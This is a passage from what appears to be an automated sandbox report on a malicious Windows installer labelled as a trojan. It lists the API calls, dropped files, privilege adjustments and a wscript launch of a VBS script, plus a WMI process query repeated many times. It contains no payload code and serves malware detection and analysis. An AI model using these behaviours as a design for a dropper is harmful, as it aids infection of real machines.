                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_007DF3AB NtdllDialogWndProc_W
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_007DF45A ClientToScreen,NtdllDialogWndProc_W
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_007DF425 NtdllDialogWndProc_W
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_007DF5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_007DF594 GetWindowLongW,NtdllDialogWndProc_W
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_0078B7F2 NtdllDialogWndProc_W
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_0078B845 NtdllDialogWndProc_W
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_007DFE80 NtdllDialogWndProc_W
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_007DFF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_007DFF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_002829C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_002F02AA NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_002EE769 NtdllDialogWndProc_W,CallWindowProcW
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_002EEA4E NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_002EEAA6 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_002EECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_0029AC99 NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_0029AD5C NtdllDialogWndProc_W,74A3C8D0,NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_002EEFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_0029AFB4 GetParent,NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_002EF0A1 SendMessageW,NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_002EF122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_002EF37C NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_002EF3AB NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_002EF3DA NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_002EF425 NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_002EF45A ClientToScreen,NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_002EF594 GetWindowLongW,NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_002EF5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_0029B7F2 NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_0029B845 NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_002EFE80 NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_002EFF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_002EFF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_007B702F CreateFileW,DeviceIoControl,CloseHandle
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_007AB9F1 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,74BD5590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_007B82D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_002C82D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\687630.msi
                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi
                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\SourceHash{29EF7317-DCA1-4159-97B2-C883AD400AC6}
                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7739.tmp
                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI77F6.tmp
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_00782B40
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_007D30AD
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_00783680
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_0077DCD0
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_0077A0C0
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_00790183
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_007B220C
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_00778530
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_00776670
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_00790677
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_007A8779
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_007DA8DC
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_00790A8F
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_00776BBC
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_00778CA0
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_0079AC83
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_0078AD5C
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_00790EC4
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_007A4EBF
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_007A113E
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_007912F9
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_007A542F
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_007DF5D0
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_007A599F
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_0079DA74
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_00775D32
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_0077BDF0
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_0079BDF6
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_00791E5A
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_0079DF69
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_007A7FFD
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_007BBFB8
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_0028DCD0
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_0028A0C0
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_002A0183
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_002C220C
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_00288530
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_00286670
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_002A0677
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_002B8779
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_002EA8DC
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_002A0A8F
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_00286BBC
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_00288CA0
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_002AAC83
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_0029AD5C
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_002B4EBF
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_002A0EC4
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_002E30AD
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_002B113E
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_002A12F9
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_002B542F
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_002EF5D0
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_00293680
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_002B599F
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_002ADA74
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_00285D32
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_0028BDF0
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_002ABDF6
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_002A1E5A
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_00289EC9
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_002ADF69
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_002CBFB8
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_002B7FFD
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: String function: 0029F885 appears 68 times
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: String function: 002A7750 appears 42 times
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: String function: 00797750 appears 42 times
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: String function: 0078F885 appears 68 times
                Source: classification engine Classification label: mal100.troj.evad.winMSI@17/14@0/1
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_007BD712 GetLastError,FormatMessageW
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_007AB8B0 AdjustTokenPrivileges,CloseHandle
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_007ABEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_002BB8B0 AdjustTokenPrivileges,CloseHandle
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe Code function: 8_2_002BBEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_007BEA85 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_007B6F5B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_007BEFCD CoInitialize,CoCreateInstance,CoUninitialize
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_007731F2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
                Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\Microsoft\CML77E5.tmp
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2432:120:WilError_03
                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\TEMP\~DF80922B01F2801C61.TMP
                Source: C:\Windows\Installer\MSI77F6.tmp Process created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\PAITNR.vbs
                Source: C:\Windows\SysWOW64\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp' (this query is repeated 97 times in the report)
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
